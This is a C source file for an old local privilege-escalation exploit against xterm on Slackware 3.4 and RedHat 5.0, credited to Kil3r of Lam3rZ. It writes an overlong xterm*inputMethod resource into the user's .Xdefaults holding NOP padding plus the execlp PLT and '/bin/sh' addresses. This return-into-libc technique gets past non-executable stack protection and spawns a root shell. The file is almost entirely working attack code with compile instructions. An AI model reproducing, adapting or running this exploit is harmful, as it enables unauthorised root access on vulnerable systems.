/*
 
In slackware (3.4): EXECLP should be 0x804bc78, and BIN_SH - 0x8063d2e;
In Redhat (5.0) : EXECLP should be 0x804b1cc, adn BIN_SH - 0x80626f2;
 
 
 Based  on  Solar   Designer's:  "Getting  around   non-executable
 stack(fix)"  post   and:   Rafał   Wojtczuk's  "Defeating   Solar
 Designer'a Non-executable Stack Patch"
 
 sploit by  Kil3r of  Lam3rZ against  both Xaw  and neXtaw widgets
 based on xterm_exp.c by alcuin
 
 Compile it like this:
 gcc 3xterm.c -L /usr/X11/lib/ -lXaw -lXmu -lXt -lSM -lICE -lXext -lX11 -lc
 
 GreetZ: bulba, smierc, all of  Lam3rZ teem and other Polish HackerZ ;)
*/

#include <stdlib.h>
#include <stdio.h>
#include <ctype.h>


#define CONFFILE ".Xdefaults"
#define OLDFILE ".Xdefaults.old"
#define NEWFILE ".Xdefaults.new"

#define EXECLP 0x804bc78  // execlp PLT adress in xterm
#define BIN_SH 0x8063d2e  // "/bin/sh" string address in xterm ;)


int *ptr;

void main(int argc, char *argv[])
{

  char *home;
  FILE *f_in, *f_out;
  char buff[16384];
  char shellbuf[16384];
  char *s;
  int i;

  if (home = getenv("HOME")) chdir(home);

  if (!(f_out = fopen(NEWFILE, "w")))
    {
      perror("fopen");
      exit(1);
    }

  if (f_in = fopen(CONFFILE, "r"))
    {
      fseek(f_in,0,SEEK_SET);
      while (!feof(f_in))
        {
          fgets(buff,16384,f_in);
          for (s=buff;isblank(*s);s++);
          if (strncmp(s,"xterm*inputMethod",17)<0)
            fputs(buff,f_out);
        }
      fclose(f_in);
    }

  /* fill the buffer with nops */
  memset(shellbuf, 0x90, sizeof(shellbuf));
  shellbuf[sizeof(shellbuf)-1] = 0;

  ptr = (int *)(shellbuf+1028);
  *ptr++ =EXECLP;
  *ptr++ =EXECLP;
  *ptr++ =BIN_SH;
  *ptr++ =BIN_SH;
  *ptr++ = 0;

  fputs("xterm*inputMethod:",f_out);
  fputs(shellbuf, f_out);
  fclose(f_out);

  system("/bin/cp "CONFFILE" "OLDFILE);
  system("/bin/mv -f "NEWFILE" "CONFFILE);

  execl("/usr/X11R6/bin/xterm","xterm",NULL);
}
/*                    www.hack.co.za              [2000]*/